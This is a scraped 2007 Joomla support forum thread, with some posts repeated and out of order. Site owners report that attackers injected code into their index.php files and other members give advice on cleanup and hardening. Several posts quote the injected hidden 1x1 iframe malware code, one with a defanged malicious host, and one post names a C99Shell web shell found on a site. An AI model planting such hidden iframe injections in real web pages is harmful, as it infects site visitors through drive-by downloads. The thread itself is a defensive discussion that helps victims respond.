Joomla! :: View topic - two site hacked this week!!!

So, what does a person do to keep them out!!

I have fully reinstalled the site over the old site, is this sufficient? Or should I have the web host delete the site and then start again?

I just had my site hacked also >:(

. They hacked into my index file and installed that nice little ----
"
" ----
My host guy found it and removed the code and everything seams to be fine for now. i changed all passwords.
He says they got in through Joomla.
So, what does a person do to keep them out!!

My site got haked today
I installed 1.0.12 about 2 weeks ago
I moved the files the hacker instaleld to a folder and here are the links
[MOD NOTE: LINKS TO SCRIPT KIDDIE GRAFFITI REMOVED]

I small utility to monitor the two files would by useful and one which could copy the proper files back would be splendid. I know its not an answer to security issue but it would stop this hack.

Let's just get this problem solved. I wish i knew more to help solve this problem, but i am an amatur dude. It would be nice if there was a way to start a forum, data base, or sometype of way to compare sites that each person had installed, set ups, versions,..ect... that were hacked to narrow down where the gate is. All though we wouldn't be able to public post these cause then the hackers would love us even more. Just an idea.

Author:	jsm25 [ Sun Jan 21, 2007 11:30 pm ]
Post subject:	two site hacked this week!!!
I have had two Joomla website hacked this week . So this posting is a warring to other to take care. I am running Joomal 1.0.12 on both site and have followed the security advice on the forum as best as I can. All file have had there permissions set to 644 and folders to 755. What’s happened is the hacker has added the following code to the end of index.php which is not good. When I tried to access the home page my anti virus software popup and started moving file from the browser to the virus vault. http://www.xxxxxx.xxx/xx.php</a><!-- w --> php" width=1 height=1>http://www.xxxxxx.xxx/xx.php.php</a><!-- w -->" width=1 height=1> http://www.xxxxxx.xxx/xx.php.php</a><!-- w -->" width=1 height=1> The index.php file had its permissions set to 644 I have now set it to 444 and just hope that this will stop them.

Author:	exrace [ Sun Jan 21, 2007 11:41 pm ]
Post subject:	Re: two site hacked this week!!!
Is your site on a shared host?

Author:	zimv20 [ Sun Jan 21, 2007 11:43 pm ]
Post subject:	Re: two site hacked this week!!!
wow, that sucks. i'd also like to see more details, like which version of php, how you turned off register globals, what kind of host(s) you are using, etc. edit: oh yeah -- if you wouldn't mind, please list the 3rd-party stuff you're using

Author:	jsm25 [ Sun Jan 21, 2007 11:54 pm ]
Post subject:	Re: two site hacked this week!!!
Yes it’s a shared host Its PHP version 4xx I will check tomorrow and post full info All security settings such a global are set corretaly. When I start Joomla admin I do not get any warnings and the bottom of the page.

Author:	j2007 [ Mon Jan 22, 2007 9:53 am ]
Post subject:	Re: two site hacked this week!!!
I'm sorry to hear that . Do you have a backup of your files? I'm a newbie here, so I'll ask whether they also changes/erased other data, or just edited the index.php?

Joomla! http://forum.joomla.org/

two site hacked this week!!! http://forum.joomla.org/viewtopic.php?f=267&t=133517	Page 1 of 2

Author:	jsm25 [ Mon Jan 22, 2007 10:32 am ]
Post subject:	Re: two site hacked this week!!!
I have now found that the .htaccess file has been deleted also I have set the file permissions to 444 in the root folder. However as soon as I start the joomla website the file permissions are set back to 644, Is this correct can joomla do this? PHP version 4.4.2 MySql version 4.1.21- standard Apache version 1.3.36 - Unix

Author:	rliskey [ Wed Jan 24, 2007 3:01 am ]
Post subject:	Re: two site hacked this week!!!
Be sure to delete the entire directory and start from clean backups, or from scratch. Once they get in, there are many things they may have done to your site. Not much point in trying to figure out how many changes were made. For more info, see: http://forum.joomla.org/index.php/topic,81058.0.html

Author:	jsm25 [ Wed Jan 24, 2007 8:54 am ]
Post subject:	Re: two site hacked this week!!!
I have fully reinstalled the site over the old site, is this sufficient? Or should I have the web host delete the site and then start again?

Author:	cowboyfred [ Thu Jan 25, 2007 2:32 am ]
Post subject:	Re: two site hacked this week!!!
I just had my site hacked also . They hacked into my index file and installed that nice little ---- "http://www.xxxxxx.xxx/xx.php</a><!-- w --> php" width=1 height=1>http://www.xxxxxx.xxx/xx.php.php</a><!-- w -->" width=1 height=1> http://www.xxxxxx.xxx/xx.php.php</a><!-- w -->" width=1 height=1>" ---- My host guy found it and removed the code and everything seams to be fine for now. i changed all passwords. He says they got in through Joomla. So, what does a person do to keep them out!!

Author:	rliskey [ Thu Jan 25, 2007 3:36 am ]
Post subject:	Re: two site hacked this week!!!
Quote: So, what does a person do to keep them out!! 1) Read this: http://forum.joomla.org/index.php/topic,81058.0.html 2) Delete the entire public_html directory and reinstall from clean backups or from original installs. Once they get in, there are many things they may have done to your site, and you may never find all Trojan Horses, meaning you may get attacked again at any time.

Author:	rliskey [ Thu Jan 25, 2007 6:44 am ]
Post subject:	Re: two site hacked this week!!!
Quote: I have fully reinstalled the site over the old site, is this sufficient? Or should I have the web host delete the site and then start again? Depends on how the reinstall was done. A complete reinstall would take care of Joomla file issues, but if a non-Joomla file was added to a standard Joomla directory, then reinstalling Joomla probably would not effect that file. That's why I recommend totally deleting the directory and creating a new one before reinstalling. That guarantees a complete new install with no lingering Trojan Horses. Of course you can also mess around with "rm -R *" which does essentially the same thing.

Author:	brian [ Thu Jan 25, 2007 10:42 am ]
Post subject:	Re: two site hacked this week!!!
cowboyfred wrote: I just had my site hacked also . They hacked into my index file and installed that nice little ---- "http://www.xxxxxx.xxx/xx.php</a><!-- w --> php" width=1 height=1>http://www.xxxxxx.xxx/xx.php.php</a><!-- w -->" width=1 height=1> http://www.xxxxxx.xxx/xx.php.php</a><!-- w -->" width=1 height=1>" ---- My host guy found it and removed the code and everything seams to be fine for now. i changed all passwords. He says they got in through Joomla. So, what does a person do to keep them out!! This particular hack is not a joomla hack. It has been reported elsewhere (back in september I think) as a hack in cpanel. Cpanel released a patch to fix this,

Author:	exrace [ Thu Jan 25, 2007 12:42 pm ]
Post subject:	Re: two site hacked this week!!!
I would suggest finding another hosting company who has better controls and knowledge of their setups.

Author:	brian [ Thu Jan 25, 2007 12:44 pm ]
Post subject:	Re: two site hacked this week!!!
Also you should do a virus scan of your local PC as this hack attempts to download a virus to the computer of every visitor to your site

Author:	candihot [ Sat Jan 27, 2007 11:39 pm ]
Post subject:	Re: two site hacked this week!!!
my joomla site was hacked last night or today early morning. I won't give that duckass the benefit of the doubt mentioning his/her name, but they shut down my site. How are these hackers able to find, target and disable joomla sites? Is there some spider/bot that searches the web for Joomla tags? I've removed any joomla meta tags, but it seems they have other ways of finding Joomla sites. Does the following information lend any clues as to what I must do to reestablish my site: HACKED BY XXXXX; (duckass left a weblink here too) Warning: main() [function.main]: open_basedir restriction in effect. File(/includes/version.php) is not within the allowed path(s): (/home/xxxx:/usr/lib/php:/usr/local/lib/php:/tmp) in /home/xxxx/public_html/xxxx/includes/joomla.php on line 71 Warning: main(/includes/version.php) [function.main]: failed to open stream: Operation not permitted in /home/xxx/public_html/xxx/includes/joomla.php on line 71 Fatal error: main() [function.require]: Failed opening required '/includes/version.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/xxx/public_html/xxx/includes/joomla.php on line 71

Author:	berrigorri [ Sun Feb 11, 2007 1:05 pm ]
Post subject:	Re: two site hacked this week!!!
i found las night my site hacked, the index.php and index2.php deleted, and created a index.html i think the hole is com_babackup i found the index.html, 7us.php and use.php (is a PHP/C99Shell.A trojan) in /administrator/com_babackup/classes changed.. grffggfgrttllñlkrt !!

Page 1 of 2	All times are UTC
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group http://www.phpbb.com/

Author:	cowboyfred [ Thu Jan 25, 2007 3:49 pm ]
Post subject:	Re: two site hacked this week!!!
Thanks for all the info As far as i know, looking at my files and research on the web the attack is just inserting the "I-frame" and not messing up the site. Their attack is the sites users, gaining access to the users computers, not the website. Because, if the site is messed up then no one will visit the site. UNLESS???!!! They have also hidden a code to gain access back to the site and infect it again. This is just an idea. Also, i use camelot hosting and i informed him of a possible hack. He immediataly fixed the hack and even gave me a phone call to explain and make sure that everything is ok. Now, that is customer service

Author:	brian [ Thu Jan 25, 2007 4:35 pm ]
Post subject:	Re: two site hacked this week!!!
No customer sevice would have been to apply the fix when it was released months ago and not leave you vulnerable

Author:	rliskey [ Thu Jan 25, 2007 5:09 pm ]
Post subject:	Re: two site hacked this week!!!
@ brian I was wondering how you are able to tell from this code insert that it's a cPanel attack? I would have thought it could also be done by a Trojan Horse or through the J! Template Mgr. Are you saying it has to have been a cPanel attack because of the file permissions (644)?

Author:	brian [ Thu Jan 25, 2007 5:11 pm ]
Post subject:	Re: two site hacked this week!!!
I am saying that its a cpanel attack as back in september (iirc) this exact same hack occured and after discussions on the webhostingtalk and cpanel forums cpanel released a patch If as a mod you have access to the xxxxx in the first post just google for it and you will get the links othewise pm me

Author:	studiomejia [ Thu Jan 25, 2007 6:30 pm ]
Post subject:	Re: two site hacked this week!!!
My site got haked today I installed 1.0.12 about 2 weeks ago I moved the files the hacker instaleld to a folder and here are the links [MOD NOTE: LINKS TO SCRIPT KIDDIE GRAFFITI REMOVED]

Author:	cowboyfred [ Thu Jan 25, 2007 9:56 pm ]
Post subject:	Re: two site hacked this week!!!
studiomejia wrote: My site got haked today I installed 1.0.12 about 2 weeks ago I moved the files the hacker instaleld to a folder and here are the links [MOD NOTE: LINKS TO SCRIPT KIDDIE GRAFFITI REMOVED] dang you really got hacked. my hacker just intalled that little I-frame download/redirect.

Author:	exrace [ Sun Jan 28, 2007 12:25 am ]
Post subject:	Re: two site hacked this week!!!
There are other fingerprints a joomla site has other then the meta tags like index.php?option=com_frontpage but it is possible they gained access from another account on your hosts server. You might want to have your host check things over and review your log files and be sure you are running the latest versions of Joomla and any trusted 3rd party extensions. Many of these types of attacks are from a comprised account on another site on a shared host.

Author:	SZippy [ Sun Jan 28, 2007 1:01 am ]
Post subject:	Re: two site hacked this week!!!
Been hacked here also I have been picking through folder after folder for about 3.5 hrs now. Irc hacks and back doors all over the place. This started right after the 1.0.12 upgrade. And this was on two sites one that was just installed without and outside modules or components. I just started to work on this site. Our provider states there is a hole in Joomla that let them in. No what ??? Our site has been trashed and the backup is probably not going to help. SZippy Update 2227est 27jan07 Still at it since 1730est. Most every folder had something hidden in it. The biggest hit was the cgi-bin and administrator/components/com_linkdirectory folder.

Author:	cowboyfred [ Sun Jan 28, 2007 1:13 am ]
Post subject:	Re: two site hacked this week!!!
when i was hacked i was running Joomla 1.0.10. with a bunch of extensions, mods... Then after the hack i upgraded to the 1.0.12. My hoster also said it was Joomla, but of course no one is admitting any guilt. I don't care who is at fault Let's just get this problem solved. I wish i knew more to help solve this problem, but i am an amatur dude. It would be nice if there was a way to start a forum, data base, or sometype of way to compare sites that each person had installed, set ups, versions,..ect... that were hacked to narrow down where the gate is. All though we wouldn't be able to public post these cause then the hackers would love us even more. Just an idea.

Author:	jsm25 [ Mon Jan 29, 2007 12:11 am ]
Post subject:	Re: three site hacked this week
It three times this week now and I am getting fed up. Same as last time the hack added lines of code to the index.php and this time to the index2.php file as well. Also at lot more line were added to the file. I have set the file permissions to 644 all on Joomal settings are correct so I just don’t know what to do now. I will however delete the site and start afresh next week and see how that does. I small utility to monitor the two files would by useful and one which could copy the proper files back would be splendid. I know its not an answer to security issue but it would stop this hack.

Author:	alamgir99 [ Mon Jan 29, 2007 12:33 am ]
Post subject:	Re: two site hacked this week!!!
jsm25 wrote: I small utility to monitor the two files would by useful and one which could copy the proper files back would be splendid. I know its not an answer to security issue but it would stop this hack. These are the two files you see. There are possibly dozens of other modified by the cracking scripts. If you have followed the security guidelines on this forum, your site would have been safe. There are millions of other safe site using joomla. alamgir

Author:	rliskey [ Mon Jan 29, 2007 12:42 am ]
Post subject:	Re: two site hacked this week!!!
Quote: Let's just get this problem solved. I wish i knew more to help solve this problem, but i am an amatur dude. It would be nice if there was a way to start a forum, data base, or sometype of way to compare sites that each person had installed, set ups, versions,..ect... that were hacked to narrow down where the gate is. All though we wouldn't be able to public post these cause then the hackers would love us even more. Just an idea. Check if this helps: http://forum.joomla.org/index.php/topic,130926

Author:	jsm25 [ Mon Jan 29, 2007 8:54 am ]
Post subject:	Re: two site hacked this week!!!
My Recommendations If you are using cpanel changed your password, don’t level the one you were given and change it frequently. Check file and folder permissions and don’t forget your root folder public_html this folder can quite easily be overlooked.

Author:	yusufsel [ Mon Feb 26, 2007 1:21 pm ]
Post subject:	Re: two site hacked this week!!!
my 4 joomla sites was hacked same method. I use joomla 1.0.12 version. My other joomla versions are not hacked. the hacker has added the following code to joomla main directory index.php first line. Code: <!-- ~ --><iframe width=1 height=1 border=0 frameborder=0 src="h**p://traff.step57.info/10/"></iframe><!-- ~ --> I clean the codes. and I use plesk 8.01. I run rkhunter on the plesk panel for scan the server but no find any virus or trojan... I checked permissons. but the code added again... please help